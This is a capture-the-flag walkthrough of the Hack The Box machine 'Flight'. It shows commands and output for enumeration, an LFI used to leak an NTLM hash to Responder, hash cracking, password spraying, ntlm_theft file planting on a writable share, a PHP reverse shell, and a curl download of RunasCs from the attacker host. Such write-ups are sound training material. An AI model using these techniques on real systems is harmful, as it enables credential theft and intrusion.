Flight | HTB

Machine - https://app.hackthebox.com/machines/Flight

IP - 10.10.11.187

NMAP

└─$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49667,49673,49674,49694,49719 10.10.11.187 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-19 14:12 IST
Nmap scan report for 10.10.11.187
Host is up (0.31s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-19 15:42:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49719/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-19T15:44:03
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m02s

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 137.69 seconds

Port 53

└─$ dig any @10.10.11.187 flight.htb                 

; <<>> DiG 9.20.8-6-Debian <<>> any @10.10.11.187 flight.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24195
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 4

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;flight.htb.                    IN      ANY

;; ANSWER SECTION:
flight.htb.             600     IN      A       192.168.22.180
flight.htb.             3600    IN      NS      g0.flight.htb.
flight.htb.             3600    IN      SOA     g0.flight.htb. hostmaster.flight.htb. 41 900 600 86400 3600

;; ADDITIONAL SECTION:
g0.flight.htb.          3600    IN      A       10.10.11.187
g0.flight.htb.          3600    IN      AAAA    dead:beef::23d
g0.flight.htb.          3600    IN      AAAA    dead:beef::d139:bc2b:d648:e9eb

;; Query time: 359 msec
;; SERVER: 10.10.11.187#53(10.10.11.187) (TCP)
;; WHEN: Tue Aug 19 14:23:04 IST 2025
;; MSG SIZE  rcvd: 191

Port 80

For some reason i am unable to do directory enumeration

Let’s try to do subdomain enum

└─$ wfuzz -c -u <http://flight.htb/> -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --hc 302,400,301,404 --hw 530
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: <http://flight.htb/>
Total requests: 484699

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                                                     
=====================================================================

000000264:   200        90 L     412 W      3996 Ch     "school"                                                                                                                                                                                                    

Total time: 373.8789
Processed Requests: 384
Filtered Requests: 383
Requests/sec.: 1.027070

 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 28: Operation timed out after 90000 milliseconds with 0 bytes received

let’s add this to our hosts file and visit

Let’s do a directory enum

└─$ dirsearch -u  <http://school.flight.htb/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/anurag/htb/Flight/reports/http_school.flight.htb/__25-08-19_19-33-33.txt

Target: <http://school.flight.htb/>

[19:33:33] Starting:                                                                                                                                                                                                                                                         
[19:34:22] 200 -    2KB - /about.html                                       
[19:35:00] 200 -    2KB - /cgi-bin/printenv.pl                              
[19:35:15] 503 -  406B  - /examples                                         
[19:35:15] 503 -  406B  - /examples/
[19:35:15] 503 -  406B  - /examples/jsp/index.html
[19:35:15] 503 -  406B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[19:35:15] 503 -  406B  - /examples/jsp/snp/snoop.jsp
[19:35:15] 503 -  406B  - /examples/servlet/SnoopServlet
[19:35:15] 503 -  406B  - /examples/servlets/index.html                     
[19:35:15] 503 -  406B  - /examples/servlets/servlet/RequestHeaderExample   
[19:35:15] 503 -  406B  - /examples/websocket/index.xhtml
[19:35:15] 503 -  406B  - /examples/servlets/servlet/CookieExample
[19:35:24] 301 -  347B  - /images  ->  <http://school.flight.htb/images/>     
[19:35:26] 200 -    3KB - /home.html                                        
[19:35:28] 200 -    4KB - /images/                                          
[19:36:11] 301 -  347B  - /styles  ->  <http://school.flight.htb/styles/>     
                                                                             
Task Completed

on visiting http://school.flight.htb/cgi-bin/printenv.pl we found

COMSPEC="C:\\Windows\\system32\\cmd.exe"
CONTEXT_DOCUMENT_ROOT="/xampp/cgi-bin/"
CONTEXT_PREFIX="/cgi-bin/"
DOCUMENT_ROOT="C:/xampp/htdocs/school.flight.htb"
GATEWAY_INTERFACE="CGI/1.1"
HTTP_ACCEPT="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
HTTP_ACCEPT_ENCODING="gzip, deflate"
HTTP_ACCEPT_LANGUAGE="en-US,en;q=0.5"
HTTP_CONNECTION="keep-alive"
HTTP_HOST="school.flight.htb"
HTTP_PRIORITY="u=0, i"
HTTP_UPGRADE_INSECURE_REQUESTS="1"
HTTP_USER_AGENT="Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
MIBDIRS="/xampp/php/extras/mibs"
MYSQL_HOME="\\xampp\\mysql\\bin"
OPENSSL_CONF="/xampp/apache/bin/openssl.cnf"
PATH="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\;C:\\Users\\svc_apache\\AppData\\Local\\Microsoft\\WindowsApps"
PATHEXT=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC"
PHPRC="\\xampp\\php"
PHP_PEAR_SYSCONF_DIR="\\xampp\\php"
QUERY_STRING=""
REMOTE_ADDR="10.10.14.7"
REMOTE_PORT="47730"
REQUEST_METHOD="GET"
REQUEST_SCHEME="http"
REQUEST_URI="/cgi-bin/printenv.pl"
SCRIPT_FILENAME="C:/xampp/cgi-bin/printenv.pl"
SCRIPT_NAME="/cgi-bin/printenv.pl"
SERVER_ADDR="10.10.11.187"
SERVER_ADMIN="postmaster@localhost"
SERVER_NAME="school.flight.htb"
SERVER_PORT="80"
SERVER_PROTOCOL="HTTP/1.1"
SERVER_SIGNATURE="<address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 Server at school.flight.htb Port 80</address>\\n"
SERVER_SOFTWARE="Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1"
SYSTEMROOT="C:\\Windows"
TMP="\\xampp\\tmp"
WINDIR="C:\\Windows"

on looking at blogs, the URL was interesting

When trying to access files, we get this

Looks like some filtering

Foothold/shell

Shell as ?

Auth as svc_apache

LFI

When trying / instead of \\ We get the result

This confirms that LFI is there

RFI test

Let’s see whether allow_url_include is enabled or not

Unfortunately, it was executed as a text file

NTLM hash over SMB

We already know that we have a Windows host with SMB running on it. What if we tell the web server to connect to a share on our machine? Well, if everything goes fine, it should normally try to authenticate to our SMB server, and we must be able to capture its Net-NTLMv2 hash and then crack it.

Let’s start our responder

└─$ sudo responder -I tun0

and force it to connect to our share

<http://school.flight.htb/index.php?view=//10.10.14.7/test>

we can see the hash on our responder

[+] Listening for events...                                                              

[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\\svc_apache
[SMB] NTLMv2-SSP Hash     : svc_apache::flight:f3eb77a70d216d60:4052C5B0E782A6292C794B3036B90C8E:010100000000000080105B274411DC010FE6A934FFF31F1D0000000002000800570035005A00320001001E00570049004E002D004500590055004F00310033005600530059003400550004003400570049004E002D004500590055004F0031003300560053005900340055002E00570035005A0032002E004C004F00430041004C0003001400570035005A0032002E004C004F00430041004C0005001400570035005A0032002E004C004F00430041004C000700080080105B274411DC01060004000200000008003000300000000000000000000000003000001A312B65038CBB9A9A1794D25D92469F12DD40C4FACD57D936D4EDDF3F074C520A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0037000000000000000000

let’s try to crack it

└─$ hashcat hashes.txt -m 5600 /home/anurag/stuff/rockyou.txt  
<--SNIP-->
SVC_APACHE::flight:f3eb77a70d216d60:4052c5b0e782a6292c794b3036b90c8e:010100000000000080105b274411dc010fe6a934fff31f1d0000000002000800570035005a00320001001e00570049004e002d004500590055004f00310033005600530059003400550004003400570049004e002d004500590055004f0031003300560053005900340055002e00570035005a0032002e004c004f00430041004c0003001400570035005a0032002e004c004f00430041004c0005001400570035005a0032002e004c004f00430041004c000700080080105b274411dc01060004000200000008003000300000000000000000000000003000001a312b65038cbb9a9a1794d25d92469f12dd40c4facd57d936d4eddf3f074c520a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0037000000000000000000:S@Ss!K@*t13
<--SNIP-->

LDAP and smb both were able to authenticate

└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.187 -d flight.htb -u svc_apache -p  'S@Ss!K@*t13'; echo; done
LDAP        10.10.11.187    389    G0               [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP        10.10.11.187    389    G0               [+] flight.htb\\svc_apache:S@Ss!K@*t13 

SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\\svc_apache:S@Ss!K@*t13

Let’s enum shares since LDAP was not possible

└─$ smbmap -H 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \\    /"  ||   _  "\\ |"  \\    /"  |     /""\\       |   __ "\\
  (:   \\___/  \\   \\  //   |(. |_)  :) \\   \\  //   |    /    \\      (. |__) :)
   \\___  \\    /\\  \\/.    ||:     \\/   /\\   \\/.    |   /' /\\  \\     |:  ____/
    __/  \\   |: \\.        |(|  _  \\  |: \\.        |  //  __'  \\    (|  /
   /" \\   :) |.  \\    /:  ||: |_)  :)|.  \\    /:  | /   /  \\   \\  /|__/ \\
  (_______/  |___|\\__/|___|(_______/ |___|\\__/|___|(___/    \\___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     <https://github.com/ShawnDEvans/smbmap>

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.11.187:445        Name: flight.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Shared                                                  READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY
        Web                                                     READ ONLY
[*] Closed 1 connections

Users and Web looks interesting, let’s connect and see

─$ smbmap -H 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' -r --dir-only

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \\    /"  ||   _  "\\ |"  \\    /"  |     /""\\       |   __ "\\
  (:   \\___/  \\   \\  //   |(. |_)  :) \\   \\  //   |    /    \\      (. |__) :)
   \\___  \\    /\\  \\/.    ||:     \\/   /\\   \\/.    |   /' /\\  \\     |:  ____/
    __/  \\   |: \\.        |(|  _  \\  |: \\.        |  //  __'  \\    (|  /
   /" \\   :) |.  \\    /:  ||: |_)  :)|.  \\    /:  | /   /  \\   \\  /|__/ \\
  (_______/  |___|\\__/|___|(_______/ |___|\\__/|___|(___/    \\___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     <https://github.com/ShawnDEvans/smbmap>

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
                                                                                                                             
[+] IP: 10.10.11.187:445        Name: flight.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        ./NETLOGON
        dr--r--r--                0 Fri Sep 23 01:17:44 2022    .
        dr--r--r--                0 Fri Sep 23 01:17:44 2022    ..
        Shared                                                  READ ONLY
        ./Shared
        dr--r--r--                0 Sat Oct 29 01:51:28 2022    .
        dr--r--r--                0 Sat Oct 29 01:51:28 2022    ..
        SYSVOL                                                  READ ONLY       Logon server share 
        ./SYSVOL
        dr--r--r--                0 Fri Sep 23 01:17:44 2022    .
        dr--r--r--                0 Fri Sep 23 01:17:44 2022    ..
        dr--r--r--                0 Fri Sep 23 01:17:44 2022    flight.htb
        Users                                                   READ ONLY
        ./Users
        dw--w--w--                0 Fri Sep 23 01:46:56 2022    .
        dw--w--w--                0 Fri Sep 23 01:46:56 2022    ..
        dr--r--r--                0 Fri Sep 23 00:58:03 2022    .NET v4.5
        dr--r--r--                0 Fri Sep 23 00:58:02 2022    .NET v4.5 Classic
        dr--r--r--                0 Tue Nov  1 00:04:00 2022    Administrator
        dr--r--r--                0 Wed Jul 21 01:49:19 2021    All Users
        dr--r--r--                0 Fri Sep 23 01:38:23 2022    C.Bum
        dw--w--w--                0 Wed Jul 21 00:50:24 2021    Default
        dr--r--r--                0 Wed Jul 21 01:49:19 2021    Default User
        dw--w--w--                0 Wed Jul 21 00:53:25 2021    Public
        dr--r--r--                0 Sat Oct 22 00:20:21 2022    svc_apache
        Web                                                     READ ONLY
        ./Web
        dr--r--r--                0 Wed Aug 20 03:17:01 2025    .
        dr--r--r--                0 Wed Aug 20 03:17:01 2025    ..
        dr--r--r--                0 Wed Aug 20 03:17:01 2025    flight.htb
        dr--r--r--                0 Wed Aug 20 03:17:01 2025    school.flight.htb
[*] Closed 1 connections

USers Looks like C directory

nothing was there looks like empty directories

Password spray

we found the username

└─$ netexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' -d flight.htb --users                                                                           
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.10.11.187    445    G0               Administrator                 2022-09-22 20:17:02 0       Built-in account for administering the computer/domain 
SMB         10.10.11.187    445    G0               Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.10.11.187    445    G0               krbtgt                        2022-09-22 19:48:01 0       Key Distribution Center Service Account 
SMB         10.10.11.187    445    G0               S.Moon                        2022-09-22 20:08:22 0       Junion Web Developer 
SMB         10.10.11.187    445    G0               R.Cold                        2022-09-22 20:08:22 0       HR Assistant 
SMB         10.10.11.187    445    G0               G.Lors                        2022-09-22 20:08:22 0       Sales manager 
SMB         10.10.11.187    445    G0               L.Kein                        2022-09-22 20:08:22 0       Penetration tester 
SMB         10.10.11.187    445    G0               M.Gold                        2022-09-22 20:08:22 0       Sysadmin 
SMB         10.10.11.187    445    G0               C.Bum                         2022-09-22 20:08:22 0       Senior Web Developer 
SMB         10.10.11.187    445    G0               W.Walker                      2022-09-22 20:08:22 0       Payroll officer 
SMB         10.10.11.187    445    G0               I.Francis                     2022-09-22 20:08:22 0       Nobody knows why he's here 
SMB         10.10.11.187    445    G0               D.Truff                       2022-09-22 20:08:22 0       Project Manager 
SMB         10.10.11.187    445    G0               V.Stevens                     2022-09-22 20:08:22 0       Secretary 
SMB         10.10.11.187    445    G0               svc_apache                    2022-09-22 20:08:23 0       Service Apache web 
SMB         10.10.11.187    445    G0               O.Possum                      2022-09-22 20:08:23 0       Helpdesk 
SMB         10.10.11.187    445    G0               [*] Enumerated 15 local users: flight

let’s copy them and perform a password spray

└─$ netexec smb 10.10.11.187 -u username.txt -p 'S@Ss!K@*t13' -d flight.htb --continue-on-success
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [-] flight.htb\\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE

Auth as S.Moon

└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.187 -d flight.htb -u S.Moon -p  'S@Ss!K@*t13'; echo; done
LDAP        10.10.11.187    389    G0               [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP        10.10.11.187    389    G0               [+] flight.htb\\S.Moon:S@Ss!K@*t13 

SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\\S.Moon:S@Ss!K@*t13

LDAP was not possible, let’s enum shares

└─$ netexec smb flight.htb -u S.Moon -p 'S@Ss!K@*t13' --shares
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE      
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ

We have Read and Write permission

NTLM Theft File upload

We cannot upload a text file (maybe some filtering?)

smb: \\> put test.txt 
NT_STATUS_ACCESS_DENIED opening remote file \\test.txt
smb: \\>

But we can upload file

smb: \\> put test.txt 
NT_STATUS_ACCESS_DENIED opening remote file \\test.txt
smb: \\> put test.php 
NT_STATUS_ACCESS_DENIED opening remote file \\test.php
smb: \\> put test.unknown 
putting file test.unknown as \\test.unknown (0.0 kb/s) (average 0.0 kb/s)
smb: \\>

Let’s try to perform NTLM thef via file upload

└─$ python3 ntlm_theft/ntlm_theft.py --generate all --server 10.10.16.3 --filename test
Created: test/test.scf (BROWSE TO FOLDER)
Created: test/test-(url).url (BROWSE TO FOLDER)
Created: test/test-(icon).url (BROWSE TO FOLDER)
Created: test/test.lnk (BROWSE TO FOLDER)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test-(externalcell).xlsx (OPEN)
Created: test/test.wax (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: test/Autorun.inf (BROWSE TO FOLDER)
Created: test/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

Now start the responder and upload

└─$ smbclient -U 'S.Moon%S@Ss!K@*t13' //10.10.11.187/Shared
Try "help" to get a list of possible commands.
smb: \\> prompt false
smb: \\> mput *
NT_STATUS_ACCESS_DENIED opening remote file \\zoom-attack-instructions.txt
putting file test-(fulldocx).xml as \\test-(fulldocx).xml (12.0 kb/s) (average 12.0 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \\test-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \\test-(externalcell).xlsx
NT_STATUS_ACCESS_DENIED opening remote file \\test-(remotetemplate).docx
NT_STATUS_ACCESS_DENIED opening remote file \\Autorun.inf
putting file desktop.ini as \\desktop.ini (0.0 kb/s) (average 10.3 kb/s)
putting file test-(stylesheet).xml as \\test-(stylesheet).xml (0.2 kb/s) (average 9.1 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \\test.wax
NT_STATUS_ACCESS_DENIED opening remote file \\test.scf
NT_STATUS_ACCESS_DENIED opening remote file \\test.m3u
NT_STATUS_ACCESS_DENIED opening remote file \\test.lnk
NT_STATUS_ACCESS_DENIED opening remote file \\test-(frameset).docx
putting file test.application as \\test.application (1.0 kb/s) (average 7.7 kb/s)
putting file test.jnlp as \\test.jnlp (0.1 kb/s) (average 6.5 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \\test.asx
NT_STATUS_ACCESS_DENIED opening remote file \\test.rtf
NT_STATUS_ACCESS_DENIED opening remote file \\test.htm
NT_STATUS_ACCESS_DENIED opening remote file \\test.pdf
NT_STATUS_ACCESS_DENIED opening remote file \\test-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \\test-(icon).url
smb: \\>

On responder, we get the hash

└─$ sudo responder -I tun0
<--SNIP-->
[+] Listening for events...                                                                                                                                                                                                                                                   

[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\\c.bum
[SMB] NTLMv2-SSP Hash     : c.bum::flight.htb:439d3511943fe1c7:E7F929A94B09CE2E9698D13BC54A1C0E:0101000000000000000205335911DC01110A12C6D1CD55A70000000002000800320049003100560001001E00570049004E002D0038003800310034003400360046003700460051005A0004003400570049004E002D0038003800310034003400360046003700460051005A002E0032004900310056002E004C004F00430041004C000300140032004900310056002E004C004F00430041004C000500140032004900310056002E004C004F00430041004C0007000800000205335911DC010600040002000000080030003000000000000000000000000030000027BDB9CB60F2C561E130226AD1CD3F4E3D60E016BA8F1A7D4A1B215FBD32E7D10A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0033000000000000000000

Auth as C.Bum

Let’s crack the hash

└─$ hashcat hashes.txt -m 5600 /home/anurag/stuff/rockyou.txt 
<--SNIP-->

C.BUM::flight.htb:439d3511943fe1c7:e7f929a94b09ce2e9698d13bc54a1c0e:0101000000000000000205335911dc01110a12c6d1cd55a70000000002000800320049003100560001001e00570049004e002d0038003800310034003400360046003700460051005a0004003400570049004e002d0038003800310034003400360046003700460051005a002e0032004900310056002e004c004f00430041004c000300140032004900310056002e004c004f00430041004c000500140032004900310056002e004c004f00430041004c0007000800000205335911dc010600040002000000080030003000000000000000000000000030000027bdb9cb60f2c561e130226ad1cd3f4e3d60e016ba8f1a7d4a1b215fbd32e7d10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0033000000000000000000:Tikkycoll_431012284

We can use LDAP and SMB via C.BUM

└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.187 -d flight.htb -u C.BUM -p  'Tikkycoll_431012284'; echo; done
LDAP        10.10.11.187    389    G0               [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP        10.10.11.187    389    G0               [+] flight.htb\\C.BUM:Tikkycoll_431012284 

SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\\C.BUM:Tikkycoll_431012284

Looks like we can read and write on Web

└─$ netexec smb flight.htb -u C.BUM -p 'Tikkycoll_431012284' --shares                                    
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\\C.BUM:Tikkycoll_431012284 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE      
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ,WRITE

And it is the share for the website

└─$ smbclient -U 'C.BUM%Tikkycoll_431012284' //10.10.11.187/Web   
Try "help" to get a list of possible commands.
smb: \\> ls
  .                                   D        0  Wed Aug 20 05:52:01 2025
  ..                                  D        0  Wed Aug 20 05:52:01 2025
  flight.htb                          D        0  Wed Aug 20 05:52:01 2025
  school.flight.htb                   D        0  Wed Aug 20 05:52:01 2025

                5056511 blocks of size 4096. 1249940 blocks available
smb: \\>

Let’s try to upload a text file

smb: \\flight.htb\\> put test.txt 
putting file test.txt as \\flight.htb\\test.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \\flight.htb\\> ls
  .                                   D        0  Wed Aug 20 05:54:16 2025
  ..                                  D        0  Wed Aug 20 05:54:16 2025
  css                                 D        0  Wed Aug 20 05:52:01 2025
  images                              D        0  Wed Aug 20 05:52:01 2025
  index.html                          A     7069  Thu Feb 24 11:28:10 2022
  js                                  D        0  Wed Aug 20 05:52:01 2025
  test.txt                            A        5  Wed Aug 20 05:54:16 2025

                5056511 blocks of size 4096. 1249940 blocks available
smb: \\flight.htb\\>

Shell as svc_apache

And we can upload php file, and it can execute

smb: \\flight.htb\\> put test.php 
putting file test.php as \\flight.htb\\test.php (0.0 kb/s) (average 0.0 kb/s)
smb: \\flight.htb\\>

We can upload a PHP RevShell and get a shell

smb: \\flight.htb\\> put revshell.php 
putting file revshell.php as \\flight.htb\\revshell.php (7.2 kb/s) (average 3.3 kb/s)
smb: \\flight.htb\\>

└─$ nc -nlvp 1234    
listening on [any] 1234 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.187] 50247
SOCKET: Shell has connected! PID: 4812
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\xampp\\htdocs\\flight.htb>whoami
flight\\svc_apache

C:\\xampp\\htdocs\\flight.htb>

Shell as C.Bum

Let’s upload RunasC and get the shell

C:\\temp>curl <http://10.10.16.3/RunasCs.exe> -o RunasCs.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 51712  100 51712    0     0  18604      0  0:00:02  0:00:02 --:--:-- 18628

